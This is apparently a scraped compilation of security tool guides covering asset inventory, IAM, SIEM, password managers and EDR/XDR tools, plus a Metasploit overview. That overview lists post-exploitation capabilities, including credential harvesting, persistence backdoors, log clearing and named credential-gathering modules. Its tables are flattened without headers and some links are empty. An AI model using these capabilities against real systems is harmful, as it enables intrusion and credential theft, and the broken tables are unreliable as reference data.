Incident Response: Quickly identify affected assets during security incidents.
Start Small: Pilot with a subset of assets before full rollout.
Document Everything: Keep clear records of configurations, integrations, and processes.
Train Users: Ensure staff are trained on tool usage and best practices.
Monitor & Iterate: Regularly review asset data and adjust processes as needed.
By leveraging these free IT Asset Inventory tools and following best practices, organizations can efficiently manage their IT assets, ensure compliance, and optimize resource utilization without significant financial investment.
Metasploit is a powerful, modular penetration testing framework widely used by security professionals for vulnerability assessment, exploitation, and post-exploitation activities. This guide provides a thorough overview, practical cheat sheet, and essential best practices for using Metasploit effectively and ethically.
Metasploit is an open-source penetration testing framework that enables security professionals to identify, exploit, and validate vulnerabilities in systems and applications. It is modular, extensible, and supports a wide range of exploits, payloads, and post-exploitation tools. Metasploit is used for:
Penetration testing
Security research
Vulnerability validation
Red teaming and adversary simulation
Windows 11: 1 GHz+ CPU (2+ cores), 4 GB RAM, 64 GB storage, UEFI, Secure Boot, TPM 2.0, DirectX 12+ support, HD display .
Linux: Most modern distributions are supported; ensure you have root privileges and sufficient resources.
macOS: Supported, but some features may be limited.
On Linux (Kali, Ubuntu, etc.)
On Windows
Download the installer from the .
Run the installer and follow the prompts.
Initial Setup
Launch msfconsole
from your terminal or command prompt.
Initialize the database with msfdb init
(if not already done).
Update modules: msfupdate
.
Metasploit is built around a modular, client-server architecture:
msfconsole: The main command-line interface for interacting with Metasploit.
Module System: Organizes exploits, payloads, auxiliary, encoders, and post-exploitation modules.
REX Library: Handles networking and exploitation primitives.
Framework Core: The API that connects components and manages module execution.
msfdb: PostgreSQL database for storing scan results, credentials, and host data .
Example Usage Pattern:
Target specific vulnerabilities (e.g., buffer overflows, web app flaws).
Can be automated or manual, depending on the level of control required .
Single (Inline): Self-contained, includes exploit and shellcode .
Staged: Delivered in parts; stager sets up connection, stage delivers payload.
Stage-less: All-in-one, no further communication needed .
Meterpreter: Advanced, in-memory, interactive shell with encrypted comms .
Shell: Basic command shell.
Bind Shell: Target listens for attacker connection .
Reverse Shell: Target connects back to attacker (bypasses firewalls) .
Scanning, fuzzing, and other non-exploit tasks.
Obfuscate payloads to evade detection.
Gather credentials, enumerate applications, escalate privileges, and more .
After gaining access, Metasploit offers a suite of post-exploitation tools:
Session Management: Interact with and manage multiple sessions.
Pivoting: Route traffic through compromised hosts to access internal networks.
Credential Harvesting: Extract stored credentials from browsers, applications, and the OS.
Application Enumeration: List installed software for further exploitation.
Packet Sniffing: Capture network traffic for sensitive data.
Backdoors: Establish persistent access.
Covering Tracks: Clear logs and edit registries to evade detection .
Example Post-Exploitation Modules:
post/windows/gather/credentials/aim
post/windows/gather/enum_chrome
post/windows/gather/enum_applications
post/windows/gather/credentials/gpp
(Group Policy Preferences credentials)
Metasploit is used in a variety of real-world contexts:
Penetration Testing: Simulate attacks to assess organizational security.
Red Team Operations: Emulate advanced persistent threats (APTs).
Security Research: Develop and test new exploits and payloads.
Incident Response: Validate and reproduce attack vectors during investigations.
Case studies and practical examples can be found in community forums, security conference presentations, and open-source documentation .
Data Privacy: Minimize data collection, encrypt sensitive data, control access, and conduct regular audits .
Cyber Hygiene: Keep software updated, use strong passwords, and enable multi-factor authentication .
Respect Privacy: Only test systems you own or have explicit permission to assess.
Transparency: Inform stakeholders and obtain consent before testing.
Accountability: Document actions and findings responsibly .
Compliance: Adhere to laws such as GDPR, CCPA, and local regulations .
Professional Codes: Follow the ACM Code of Ethics and similar frameworks .
Authorization: Never use Metasploit on unauthorized systems.
Official Documentation:
GitHub Repository:
Online Courses: Udemy, Coursera, Pluralsight
YouTube Tutorials: Search for "Metasploit tutorial" for hands-on walkthroughs
Forums: Reddit r/netsec, Stack Overflow, Rapid7 Community
Books: "Metasploit: The Penetration Tester’s Guide" by David Kennedy et al.
exploit/: Vulnerability exploitation modules
payload/: Code executed after exploitation
auxiliary/: Scanners, fuzzers, etc.
post/: Post-exploitation actions
encoder/: Payload obfuscation
nop/: No-operation generators
Metasploit is a versatile and essential tool for penetration testers and security researchers. Mastery of its architecture, modules, and ethical usage is crucial for effective and responsible security testing. Always ensure you have proper authorization and adhere to legal and ethical standards when using Metasploit.
For further learning, consult the official documentation, participate in community forums, and practice in safe, legal environments such as penetration testing labs or virtual machines.
This guide provides a detailed overview and quick-reference cheat sheet for popular free IAM tools, including their features, capabilities, limitations, deployment options, integration, security standards, and user feedback.
Authentication & Authorization: All tools provide basic authentication (verifying user identity) and authorization (controlling access to resources) .
User Management: Support for user creation, modification, deactivation, and deletion.
Access Control: Centralized management of permissions and roles (RBAC/ABAC).
Multi-Factor Authentication (MFA): Most tools support MFA, including OTP, TOTP, and integration with external authenticators .
Single Sign-On (SSO): SSO across multiple applications is a standard feature .
Integration: Support for standard protocols (SAML, OAuth2, OpenID Connect, LDAP, RADIUS, etc.) for easy integration with other systems .
Audit Logging: Basic logging and reporting for compliance and monitoring .
MFA: Most tools support TOTP, SMS, email, and integration with hardware tokens.
SSO: All tools support SSO via SAML, OIDC, or OAuth2.
Biometric: Generally not native; can be integrated via external providers or plugins .
Protocols Supported: SAML, OAuth2, OpenID Connect, LDAP, RADIUS, Kerberos .
System Integration: Can connect with cloud apps (Google Workspace, Office 365), on-premise directories (Active Directory, LDAP), and custom apps.
Federation: Shibboleth and KeyCloak excel at federated identity (cross-organization SSO) .
ISO 27001: Tools can help support compliance by enforcing access controls and audit trails .
GDPR, HIPAA, PCI DSS: Support for strong authentication, least privilege, and audit logging aids compliance .
NIST SP 800-63: Alignment with digital identity guidelines for authentication and lifecycle management .
Best Practices:
Zero Trust: Continuous verification of access requests.
Role/Attribute-Based Access Control: Fine-grained permissions .
Continuous Monitoring: Audit logs and real-time alerts .
SSO & Federation: Simplifies access and trust management .
Cloud: Most tools can be deployed on cloud infrastructure (AWS, Azure, GCP) or as managed services .
On-Premise: Full control, but requires local servers and IT resources .
Hybrid: Combine on-premise and cloud for flexibility and scalability .
Feature Set: Free versions may lack advanced features (e.g., advanced analytics, deep customization) found in paid solutions.
Scalability: May not scale as efficiently for very large organizations.
Support: Community-based support; no guaranteed SLAs.
Compliance: May require additional configuration to meet strict regulatory requirements .
Gartner Peer Insights: Real user reviews for tools like AWS IAM, KeyCloak, and others .
Community Forums: Active open-source communities for troubleshooting and feature requests.
Tech Blogs: Practical guides and user experiences are widely shared, especially for KeyCloak and Shibboleth.
Implement MFA and SSO wherever possible for enhanced security and user convenience.
Regularly audit user access and permissions to maintain least privilege.
Integrate with existing directories and cloud services for centralized management.
Stay updated with security patches and community releases.
Document your IAM architecture and policies for compliance and troubleshooting.
Free IAM tools like KeyCloak, MidPoint, OpenIAM, Shibboleth, FusionAuth, and Syncope offer robust identity and access management features suitable for small to medium organizations, developers, and academic institutions. They support essential capabilities such as SSO, MFA, user management, and integration with standard protocols. While they may lack some advanced features and enterprise-grade support, their open-source nature, flexibility, and active communities make them a strong choice for organizations seeking cost-effective IAM solutions. Careful consideration of deployment, integration, and compliance needs is essential to maximize their value and security .
Tip: For the latest user experiences and troubleshooting, consult community forums, GitHub repositories, and peer review platforms. Always test IAM tools in a controlled environment before full-scale deployment.
This guide provides a detailed overview and quick-reference cheat sheet for the most popular free and open-source SIEM (Security Information and Event Management) tools. It covers core functionalities, technical features, integration and deployment considerations, limitations, and user/community reviews.
Overview: Wazuh is a widely adopted open-source SIEM platform built on the Elastic Stack. It offers comprehensive security monitoring, log analysis, intrusion detection, and compliance management.
Core Functionality:
Log data collection and analysis from endpoints, servers, and cloud environments
Real-time threat detection and alerting
File integrity monitoring and vulnerability detection
Compliance reporting (PCI DSS, GDPR, HIPAA, etc.)
Integration with Elastic Stack for advanced search and visualization
Technical Features:
Agent-based and agentless monitoring
Scalable architecture suitable for small to large deployments
RESTful API for integrations
Supports Windows, Linux, macOS, and cloud platforms
Integration & Deployment:
Integrates natively with Elastic Stack (Elasticsearch, Logstash, Kibana)
Can be deployed on-premises or in the cloud
Extensive documentation and active community support
Limitations:
Requires tuning to reduce false positives
Advanced features (e.g., machine learning) may require additional configuration
User Reviews:
Highly rated for ease of use and flexibility
Praised for strong community support and frequent updates
Some users note a learning curve for advanced configurations .
Overview: Security Onion is a Linux distribution designed for network security monitoring, intrusion detection, and log management. It bundles several open-source tools, including Wazuh, Snort, Suricata, and Zeek.
Core Functionality:
Network traffic analysis and full packet capture
Host and network intrusion detection
Log management and correlation
Security event visualization and alerting
Technical Features:
Pre-configured with multiple security tools
Web-based dashboards for analysis (Kibana, Squert, etc.)
Scalable for enterprise environments
Integration & Deployment:
Easy deployment as a standalone appliance or distributed cluster
Integrates with a wide range of network and endpoint sensors
Limitations:
Resource-intensive; best suited for dedicated hardware or VMs
Complexity increases with scale
User Reviews:
Valued for its all-in-one approach and ease of deployment
Community is active and responsive
Some users report a steep learning curve for new users .
Overview: OSSEC is a host-based intrusion detection system (HIDS) that provides log analysis, file integrity checking, and rootkit detection. It is often used as a component in larger SIEM solutions.
Core Functionality:
Log monitoring and analysis
File integrity checking
Rootkit and malware detection
Real-time alerting
Technical Features:
Lightweight agent for endpoints
Supports Windows, Linux, macOS, and Unix
Centralized management server
Integration & Deployment:
Can be integrated with other SIEM tools (e.g., Wazuh, ELK)
Simple deployment for small to medium environments
Limitations:
Primarily focused on host-based monitoring
Lacks advanced correlation and visualization features out-of-the-box
User Reviews:
Praised for reliability and low resource usage
Users appreciate its simplicity and effectiveness for endpoint monitoring .
Overview: OSSIM (Open Source Security Information Management) is the free version of AlienVault’s USM platform. It combines multiple open-source security tools for a unified SIEM solution.
Core Functionality:
Log management and correlation
Asset discovery and vulnerability assessment
Intrusion detection (network and host-based)
Event normalization and alerting
Technical Features:
Integrates tools like Snort, OpenVAS, and OSSEC
Web-based management interface
Supports plugins for various data sources
Integration & Deployment:
Suitable for small to medium organizations
Requires dedicated server or VM
Good documentation and community support
Limitations:
Fewer features than the commercial USM version
Can be complex to configure and maintain
User Reviews:
Appreciated for its comprehensive feature set in a free package
Some users report performance issues at scale and a steeper learning curve .
Overview: The ELK Stack is not a SIEM by default but is widely used as a foundation for custom SIEM solutions due to its powerful log management and visualization capabilities.
Core Functionality:
Centralized log collection and storage (Elasticsearch)
Log parsing and transformation (Logstash)
Data visualization and dashboards (Kibana)
Technical Features:
Highly scalable and flexible
Supports a wide range of data sources and formats
Extensive plugin ecosystem
Integration & Deployment:
Can be integrated with security tools (e.g., Wazuh, OSSEC) for SIEM use
Requires custom configuration for security use cases
Limitations:
Lacks built-in security analytics and correlation rules
Requires significant setup and tuning for SIEM functionality
User Reviews:
Highly praised for visualization and search capabilities
Users note the need for expertise to build a full SIEM solution .
Overview: Prelude OSS is an open-source SIEM that supports various log formats and integrates with tools like OSSEC and Snort.
Core Functionality:
Log collection and normalization
Event correlation and alerting
Integration with IDS/IPS tools
Technical Features:
Modular architecture
Supports multiple data sources
Integration & Deployment:
Suitable for small deployments and evaluation
Can be extended with commercial modules
Limitations:
Limited scalability and features compared to other SIEMs
Smaller community and less frequent updates
User Reviews:
Considered a good entry-level SIEM for small organizations .
Overview: MozDef is a scalable SIEM platform developed by Mozilla, designed for cloud and microservices environments.
Core Functionality:
Real-time event ingestion and correlation
Automated incident response workflows
Scalable event indexing (Elasticsearch backend)
Technical Features:
Built for high-volume environments
Integrates with Docker and cloud-native tools
Integration & Deployment:
Best suited for organizations with DevOps expertise
Requires setup of supporting infrastructure (Elasticsearch, RabbitMQ, etc.)
Limitations:
Less user-friendly for beginners
Smaller user base and community
User Reviews:
Praised for scalability and automation features
Users note the need for technical expertise .
Overview: Sagan is a high-performance, real-time log analysis and correlation engine, often used alongside Snort.
Core Functionality:
Real-time log analysis and alerting
Correlation with network IDS events
Scriptable response actions
Technical Features:
Lightweight and fast
Supports custom rule sets
Integration & Deployment:
Integrates with Snort and other IDS/IPS tools
Suitable for performance-sensitive environments
Limitations:
Focused on log analysis; lacks broader SIEM features
Requires manual rule creation and tuning
User Reviews:
Valued for speed and efficiency
Best for organizations with existing IDS infrastructure .
Feature Gaps: Free versions may lack advanced analytics, machine learning, or automated response features found in commercial SIEMs .
Scalability: Some tools are best suited for small to medium environments; large-scale deployments may require significant tuning or commercial add-ons.
Support: Free tools rely on community support; professional support is often limited or paid .
Integration: While integration is possible, it may require manual configuration and technical expertise .
Documentation: Quality and depth of documentation can vary; some tools have extensive guides, others rely on community wikis .
Wazuh and Security Onion are consistently praised for their active communities, frequent updates, and comprehensive documentation.
ELK Stack is lauded for its flexibility and visualization but requires expertise to adapt for SIEM use.
OSSIM is valued for its breadth of features but can be challenging to configure and maintain.
OSSEC is appreciated for its simplicity and reliability in endpoint monitoring.
MozDef and Sagan are more niche, with positive feedback from technically advanced users but less mainstream adoption .
For all-in-one, easy deployment: Security Onion
For endpoint and log monitoring: Wazuh or OSSEC
For custom, scalable SIEM: ELK Stack (with Wazuh/OSSEC integration)
For network-centric environments: Security Onion or Sagan
For cloud-native/DevOps: MozDef
Tip: Always start with a pilot deployment, leverage community forums for support, and plan for ongoing tuning and maintenance to maximize the value of free SIEM tools.
This summary and cheat sheet should help you quickly compare, select, and deploy the best free SIEM solution for your cybersecurity needs.
This guide provides a detailed overview and quick-reference cheat sheet for the most popular free password managers and related tools. It covers core features, security, platform compatibility, import/export options, and user/community reviews, helping you choose the best free solution for your needs.
Core Features:
Unlimited Password Storage: Store as many passwords as you need, even on the free plan.
Cross-Platform Sync: Syncs across unlimited devices (Windows, macOS, Linux, iOS, Android, web).
Browser Extensions: Available for Chrome, Firefox, Safari, Edge, Opera.
Open Source: Code is publicly available for audit and improvement.
Password Generator: Built-in tool for strong, random passwords.
Two-Factor Authentication (2FA): Supports basic 2FA for added security.
Security Reports: Identifies weak, reused, or compromised passwords.
Import/Export: Easy migration via CSV/JSON; export for local backup.
Backup: Cloud-based automatic backup; manual export possible.
Security:
Encryption: AES-256 bit encryption, PBKDF2 SHA-256 key derivation.
Zero-Knowledge: Only you can access your data.
2FA Support: TOTP, email, and more.
User Reviews:
Highly rated for transparency, open-source nature, and robust free features. Community and tech reviewers consistently recommend Bitwarden as the best free password manager overall .
Limitations (Free Version):
Some advanced 2FA options and security reports require a paid plan.
Core Features:
Local Storage: Passwords are stored locally, not in the cloud.
Open Source: Fully open-source and highly customizable.
Plugins: Extensive plugin ecosystem for added features (e.g., auto-backup, browser integration).
Password Generator: Advanced options for creating strong passwords.
Cross-Platform: Officially for Windows; community ports for macOS, Linux, Android (KeePassDroid), iOS (MiniKeePass).
Import/Export: Supports CSV, XML, and other formats.
Backup: Manual or plugin-based automatic backups.
Security:
Encryption: AES-256 encryption.
2FA: Supports key files and plugins for multi-factor authentication.
Zero-Knowledge: All encryption/decryption is local.
User Reviews:
Praised for security, flexibility, and being fully offline. Some users find the interface dated and setup less user-friendly compared to cloud-based managers .
Limitations (Free Version):
No built-in cloud sync; requires manual file management or third-party sync (e.g., Dropbox, Google Drive).
No official browser extensions (third-party only).
Core Features:
Cross-Device Sync: Free plan allows syncing across one device type (either mobile or desktop, not both).
Browser Extensions: Chrome, Firefox, Safari, Edge.
Password Generator: Built-in.
Security Dashboard: Monitors password health.
Import/Export: CSV export/import.
Backup: Cloud-based automatic backup.
Security:
Encryption: AES-256 bit encryption.
2FA: Supports multi-factor authentication.
Zero-Knowledge: Provider cannot access your data.
User Reviews:
Once the most popular free manager, but recent security incidents and device sync restrictions have led to mixed reviews. Still valued for ease of use and browser integration .
Limitations (Free Version):
Only one device type at a time (mobile or desktop).
Some advanced features (e.g., dark web monitoring) are paid-only.
Core Features:
Unlimited Password Storage: No cap on entries.
Cross-Platform: Web, mobile apps.
2FA: Supported.
Password Generator: Included.
Import/Export: Supported.
Backup: Cloud-based.
Security:
Encryption: Strong encryption standards.
Zero-Knowledge: Yes.
User Reviews:
Appreciated for unlimited storage and team features, but interface is less polished than some competitors .
Limitations (Free Version):
Some advanced sharing and team features are paid-only.
Core Features:
Single Device Use: Free plan limited to one device.
Password Generator: Yes.
Security Alerts: Notifies of breaches.
Import/Export: Supported.
Backup: Cloud-based.
Security:
Encryption: AES-256.
2FA: Supported.
User Reviews:
Praised for user-friendly design and security alerts, but single-device limit is a major drawback .
Limitations (Free Version):
One device only; multi-device sync is paid.
Core Features:
Unlimited Password Storage: Yes.
Cross-Device Sync: Only one device active at a time.
Password Generator: Yes.
Import/Export: Supported.
Backup: Cloud-based.
Security:
Encryption: XChaCha20 encryption.
2FA: Supported.
User Reviews:
Known for ease of use and strong security, but device sync limitation is a common complaint .
Limitations (Free Version):
Only one device at a time.
Core Features:
Unlimited Password Storage: Yes.
Form Filling: Advanced form-filling capabilities.
Emergency Access: Included.
Import/Export: Supported.
Backup: Cloud-based.
Security:
Encryption: AES-256.
2FA: Supported.
User Reviews:
Valued for form-filling and emergency access, but interface is less modern than some competitors .
Limitations (Free Version):
Some features (e.g., cloud backup, multi-device sync) are paid-only.
Core Features:
Identity Protection: Yes.
Password Storage: Unlimited.
Cross-Device Sync: Yes.
Open Source: Yes.
Import/Export: Supported.
Backup: Cloud-based.
Security:
Encryption: End-to-end encryption.
2FA: Supported.
User Reviews:
Newer entrant, praised for privacy focus and integration with Proton’s secure ecosystem .
Limitations (Free Version):
Some advanced features may be paid in the future.
Core Features:
Passwordless Login: Yes.
Identity Theft Protection: Yes.
Cloud Storage Encryption: Yes.
Import/Export: Supported.
Backup: Cloud-based.
Security:
Encryption: Strong encryption standards.
2FA: Supported.
User Reviews:
Noted for innovative features like passwordless login, but interface can be overwhelming for beginners .
Limitations (Free Version):
Some features are paid-only.
Best Overall Free Manager: Bitwarden stands out for its unlimited storage, cross-device sync, open-source transparency, and robust security features .
Best for Local/Offline Use: KeePass is ideal if you want full control and local-only storage, with strong security and customizability .
Best for Simplicity: LastPass Free and Dashlane Free are user-friendly but have device sync limitations.
Best for Privacy: Proton Pass and Bitwarden, both open-source, are highly trusted for privacy and security.
Best for Teams: Zoho Vault offers unlimited storage and is suitable for both individuals and teams, though some features are paid.
Bitwarden is highly praised for its transparency, open-source model, and generous free tier.
KeePass is favored by tech-savvy users for its security and flexibility, though it requires more manual setup.
LastPass has lost some trust due to recent security incidents and device sync restrictions, but remains popular for ease of use.
Dashlane and NordPass are appreciated for their interfaces but criticized for device limitations in free plans.
Zoho Vault and Proton Pass are gaining traction for privacy and team features.
When choosing a free password manager, consider your priorities: device sync, privacy, open-source, or ease of use. For most users, Bitwarden offers the best balance of features, security, and usability in its free version. For those who prefer local-only storage and maximum control, KeePass is unmatched. Always enable two-factor authentication and regularly back up your password database, regardless of the tool you choose .
If you need more details on a specific tool or want a step-by-step setup guide, let me know!
This guide provides a detailed overview and quick-reference cheat sheet for leading free Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) tools. It covers core features, user/community reviews, technical considerations, and integration capabilities.
Type: Open-source EDR
Core Features:
Log analysis and real-time Windows registry monitoring
Malware/rootkit detection
Endpoint scanning and log data analysis
Active response (e.g., firewall policy enforcement)
System inventory (hardware, network services)
Integration with third-party applications
Reviews & Community Feedback:
Highly regarded for its flexibility and strong community support
Considered reliable for log-based detection and compliance monitoring
Some users note a steeper learning curve for advanced configurations
Type: Security Incident Response Platform (with EDR capabilities)
Core Features:
Dynamic dashboards and advanced filtering
Forensics and cross-analysis (integrates with VirusTotal, etc.)
Task assignment and real-time information sharing
Reviews & Community Feedback:
Praised for collaborative incident response workflows
Strong integration with other open-source tools
Best suited for teams with some security operations experience
Type: Open-source endpoint visibility tool
Core Features:
Interactive querying of OS data (processes, users, network connections)
Host-monitoring daemon for log aggregation
Configuration, performance, and health tracking
Reviews & Community Feedback:
Valued for its flexibility and transparency
Requires SQL knowledge for advanced queries
Often used as a building block in custom EDR solutions
Type: Vulnerability scanner (with EDR-adjacent features)
Core Features:
Custom scripting and plugin support
In-depth vulnerability scanning and patching indicators
Reviews & Community Feedback:
Widely used for vulnerability management
Free version has some feature limitations compared to paid tiers
Type: Intrusion Prevention/Detection System (IDS/IPS)
Core Features:
Real-time traffic analysis and packet logging
Multiple deployment modes (sniffer, logger, NIDS)
Useful for audits and threat investigations
Reviews & Community Feedback:
Highly respected in the network security community
Requires tuning to minimize false positives
Type: Open-source XDR platform
Core Features:
Integrates with Suricata (NIDS) and OSSEC (EDR)
Scalable log collection and event correlation (Elasticsearch backend)
Custom detection rules (YARA, Sigma)
Community-driven development and support
Reviews & Community Feedback:
Praised for flexibility, scalability, and strong documentation
Active community and frequent updates
Some complexity in initial setup for large environments
Type: Linux distribution for security monitoring (XDR capabilities)
Core Features:
Full packet capture, network and host-based IDS
Unified security monitoring dashboard
Integrates multiple open-source tools (e.g., Suricata, Zeek, Wazuh)
Reviews & Community Feedback:
Highly regarded for comprehensive monitoring
Strong community and regular enhancements
Resource-intensive; best for dedicated security appliances
Type: Open-source EDR/XDR platform
Core Features:
Real-time endpoint monitoring and behavioral analysis
Customizable detection rules
Community-driven enhancements and transparency
Reviews & Community Feedback:
Noted for being truly free with no licensing fees
Adaptable to organizations of any size
Community support is a key strength; some users desire more enterprise-level features
Integration: Most tools support integration with other open-source and commercial security solutions via APIs, connectors, or log forwarding.
Customization: Open-source nature allows for deep customization, especially in Wazuh, Security Onion, and OpenEDR.
Scalability: Wazuh and Security Onion are designed to scale from small to large environments.
System Requirements: Vary by tool; most require Linux (some support Windows/Mac), with minimum hardware depending on deployment size. Security Onion and Wazuh can be resource-intensive for large-scale monitoring .
Deployment Guides: All tools provide official documentation and community guides. Security Onion and Wazuh offer detailed step-by-step installation and configuration instructions.
Support: Free tools rely on community forums, GitHub issues, and user-contributed documentation. Paid support may be available for some (e.g., Wazuh).
Adoption: Free EDR/XDR tools are widely used in small to medium businesses, educational institutions, and by security researchers.
Limitations:
May lack advanced features (e.g., AI-driven analytics, automated remediation) found in commercial products
Support and updates depend on community activity
Initial setup and tuning can be complex, especially for large or heterogeneous environments
Free EDR and XDR tools such as OSSEC, TheHive, Osquery, Wazuh, Security Onion, and OpenEDR offer robust capabilities for threat detection, incident response, and security monitoring. They are highly customizable, benefit from strong community support, and are suitable for organizations seeking cost-effective security solutions. However, they may require more hands-on management and lack some advanced features of commercial offerings. For organizations with technical expertise and a willingness to engage with open-source communities, these tools provide a powerful foundation for modern cyber defense .
Getting Started
Create your first site
Basics
Learn the basics of GitBook
Publish your docs
Share your docs online
FTK Imager
Imaging
Windows
Disk imaging, file recovery
Not a full analysis suite
Autopsy
Analysis
Win/Lin/Mac
GUI, timeline, plugins
Resource-intensive
Volatility
Memory Forensics
Win/Lin/Mac
RAM analysis, plugins
CLI, learning curve
Wireshark
Network
Win/Lin/Mac
Packet capture, protocol analysis
Large files, privacy
SIFT Workstation
Platform
VM (Ubuntu)
Full suite, ready-to-use
Large download
CAINE
Platform
Live Linux
Live forensics, broad toolset
Some outdated tools
Scalpel
File Carving
Win/Lin
Fast file recovery
False positives
John the Ripper
Password
Win/Lin/Mac
Password cracking
Slow on complex hashes
Aircrack-ng
Wireless
Win/Lin
Wi-Fi key cracking
Hardware needed
Maltego
OSINT
Win/Lin/Mac
Data visualization
Limited free features
ManageEngine Endpoint Central
Windows, macOS, Linux
Asset mgmt, patching, remote control, compliance
Limited endpoints/features
User-friendly, robust features
Action1
Windows
Patch mgmt, remote access, automation, reporting
100 endpoints
Easy to use, comprehensive
OCS Inventory NG
Windows, Linux
Inventory, software deployment, monitoring
Open-source
Powerful, UI/docs could improve
Lansweeper
Windows
Asset mgmt, network scanning, inventory
100 devices
Cost-effective, easy to use
NinjaOne MDM
macOS
Automated mgmt, deployment, compliance
Free trial
Seamless Mac management
Jamf
macOS
Apple device mgmt, security, compliance
Free trial
Industry standard for Apple
osquery
Linux/Unix
System queries, monitoring, security
Open-source
Flexible, powerful
Infection Monkey
Linux/Unix
Breach simulation, vulnerability assessment
Open-source
Great for security testing
SaltStack
Linux/Unix
Config mgmt, automation, orchestration
Open-source
Scalable, flexible
Bacon Unlimited
Win, macOS, Linux
Unified mgmt, policy enforcement, security
Varies
Centralized, multi-OS support
Scalefusion UEM
Multi-OS
UEM, zero-trust, device security
Varies
Broad OS support, unified mgmt
FileWave
Multi-OS
Asset mgmt, deployment, multi-OS support
Varies
Versatile, mixed environments
Pandora FMS
Multi-OS
Monitoring, alerting, reporting
Free version
Robust, no-cost monitoring
TeamViewer RMM
Multi-OS
Remote support, monitoring, patching
Free for personal use
Trusted, easy remote support
AweSun
Win, iOS, Android
Remote desktop, basic mgmt
Free version
Good TeamViewer alternative
GreyNoise
Threat Intelligence
Community API, Research
Filters internet noise, real-time data, SIEM/SOAR integration, free for basic use
MISP
Threat Intelligence
Open-source
Structured sharing, auto-correlation, multi-format export
AlienVault OTX
Threat Intelligence
Free
Community-driven, real-time pulses, IOCs sharing
OpenCTI
Threat Intelligence
Open-source
Unified threat management, STIX/TAXII support
Yeti
Threat Intelligence
Open-source
IOC management, automated feed imports, API
Cuckoo Sandbox
Malware Analysis
Open-source
Sandbox analysis, detailed reports
CISA KEV Catalog
Vulnerability DB
Public
Known exploited vulnerabilities, regular updates
MITRE CVE
Vulnerability DB
Public
Standardized CVE IDs, global reference
MITRE ATT&CK
Threat Framework
Public
Adversary tactics/techniques, detection/response
MITRE-Cyber-Security-CVE
Vulnerability DB
Open-source
Aggregated CVE data, JSON format, community contributions
FBI (IC3, NCIJTF, etc.)
Cybercrime Intel
Public resources
Incident reporting, advisories, no standalone vulnerability DB
AssetTiger
Cloud-based
Small businesses
Free for up to 250 assets
Snipe-IT
Open-source
Teams with limited tech skills
Free (self-hosted)
Spiceworks
Cloud/on-prem
General IT asset tracking
Free
CMDBuild
Open-source
Customizable asset management
Free
Ralph 3
Open-source
Data centers, large environments
Free
GLPI
Open-source
Hardware/software/network assets
Free
Open-AudIT
Open-source
Network discovery/inventory
Free (community edition)
OCS Inventory NG
Open-source
Hardware/software inventory
Free
AssetTiger
Manual/import
Yes
Yes
Yes
Yes
Limited
Snipe-IT
Manual/import
Yes
Yes
Yes
Yes
REST API
Spiceworks
Auto/manual
Yes
Yes
Yes
Yes
Yes
CMDBuild
Manual/custom
Yes
Yes
Yes
Yes
Yes
Ralph 3
Auto/manual
Yes
Yes
Yes
Yes
Yes
GLPI
Auto/manual
Yes
Yes
Yes
Yes
Yes
Open-AudIT
Auto/manual
Yes
Yes
Yes
Yes
Yes
OCS Inventory
Auto/manual
Yes
Yes
Yes
Yes
Yes
AssetTiger
250 assets
Small orgs
Cloud
Limited
Moderate
Snipe-IT
None (self-hosted)
Customizable, open src
On-prem/cloud
REST API
Strong
Spiceworks
None
General IT, easy setup
Cloud/on-prem
Yes
Strong
GLPI
None
Advanced tracking
On-prem/cloud
Yes
Strong
Ralph 3
None
Data centers
On-prem
Yes
Moderate
Open-AudIT
Community edition limits
Network discovery
On-prem
Yes
Moderate
OCS Inventory
None
Hardware/software inv.
On-prem
Yes
Moderate
KeyCloak
Open-source SSO and identity management for modern apps/services
Web/mobile SSO, OAuth2, OIDC
MidPoint
Open-source, comprehensive identity management (provisioning, governance)
Enterprise user lifecycle
OpenIAM
Suite for identity governance, access management, and admin
Enterprise IAM, SSO, provisioning
Shibboleth
Federated identity, SSO, widely used in academia
SSO for universities, research
FusionAuth
Developer-friendly IAM with SSO, MFA, user management
App authentication, SSO, MFA
Apache Syncope
Open-source digital identity management for enterprises
User provisioning, RBAC
KeyCloak
Yes
Yes
Via external plugins
MidPoint
Yes
Yes
Limited/3rd party
OpenIAM
Yes
Yes
Limited/3rd party
Shibboleth
Yes
Yes
Not native
FusionAuth
Yes
Yes
Via external plugins
Syncope
Yes
Yes
Limited/3rd party
KeyCloak
Yes
Yes
Yes
Java, DB (Postgres/MySQL), Docker
MidPoint
Yes
Yes
Yes
Java, DB, Tomcat
OpenIAM
Yes
Yes
Yes
Java, DB, Tomcat
Shibboleth
Yes
Yes
Yes
Java, Apache, Tomcat
FusionAuth
Yes
Yes
Yes
Java, DB, Docker
Syncope
Yes
Yes
Yes
Java, DB, Tomcat
KeyCloak
Yes
Yes
Yes
Yes
Yes
Yes
SAML, OIDC, OAuth2, LDAP
Strong
MidPoint
Yes
Yes
Yes
Yes
Yes
Yes
SAML, LDAP, REST
Moderate
OpenIAM
Yes
Yes
Yes
Yes
Yes
Yes
SAML, OIDC, LDAP, REST
Moderate
Shibboleth
Yes
Yes
Yes
Yes
Yes
Yes
SAML, LDAP
Strong (academic)
FusionAuth
Yes
Yes
Yes
Yes
Yes
Yes
SAML, OIDC, OAuth2, LDAP
Growing
Syncope
Yes
Yes
Yes
Yes
Yes
Yes
SAML, LDAP, REST
Moderate
OSSEC
Yes
Yes
High
Good
Strong
Moderate
TheHive
Yes (IR focus)
Yes
High
Good
Strong
Moderate
Osquery
Yes
Yes (SQL)
High
Good
Strong
Low
Nessus
No (scanning)
Yes
Moderate
Good
Strong
Low
Snort
Yes (network)
Yes
High
Good
Strong
Moderate
Wazuh
Yes
Yes
High
Excellent
Strong
High
Security Onion
Yes
Yes
High
Excellent
Strong
High
OpenEDR
Yes
Yes
High
Excellent
Strong
High
OSSEC
Log-based EDR, compliance
Flexibility, log analysis
Learning curve
TheHive
Incident response coordination
Collaboration, integration
IR focus, not pure EDR
Osquery
Endpoint visibility
Query flexibility, transparency
Requires SQL knowledge
Nessus
Vulnerability management
Depth of scanning
Not real-time EDR
Snort
Network threat detection
Network focus, customization
False positives
Wazuh
Unified XDR, scalability
Integration, scalability
Complex setup
Security Onion
Full-stack monitoring
Comprehensive, scalable
Resource-intensive
OpenEDR
Endpoint monitoring, XDR
Free, adaptable, community
Fewer enterprise features
wget https://github.com/ossec/ossec-hids/archive/master.tar.gz
tar -zxvf master.tar.gz
cd ossec-hids-*
sudo ./install.sh
sudo /var/ossec/bin/ossec-control start
<ossec_config>
<global>
<email_notification>yes</email_notification>
<email_to>admin@example.com</email_to>
</global>
<rules>
